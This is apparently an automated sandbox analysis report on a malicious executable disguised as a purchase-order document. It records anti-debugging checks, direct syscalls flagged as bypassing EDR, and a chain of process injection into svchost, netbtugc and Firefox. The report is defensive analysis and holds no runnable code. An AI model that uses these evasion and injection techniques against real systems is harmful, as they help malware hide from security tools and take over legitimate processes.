Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]	2_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_001A0B62

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00172622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00172622
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0016083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0016083F
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001609D5 SetUnhandledExceptionFilter,	0_2_001609D5
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00160C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00160C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 5916

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 281E008

Jump to behavior

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

0_2_001A1201

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_00182BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00182BA5

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001AB226 SendInput,keybd_event,

0_2_001AB226

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_001C22DA

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-DOC1522025-12.exe"	Jump to behavior
Source: C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

0_2_001A0B62

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_001A1663

Source: PO-DOC1522025-12.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: PO-DOC1522025-12.exe, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000002.4620975139.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000003.00000000.2221464953.0000000001030000.00000002.00000001.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4621693562.0000000000F30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_00160698 cpuid

0_2_00160698

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

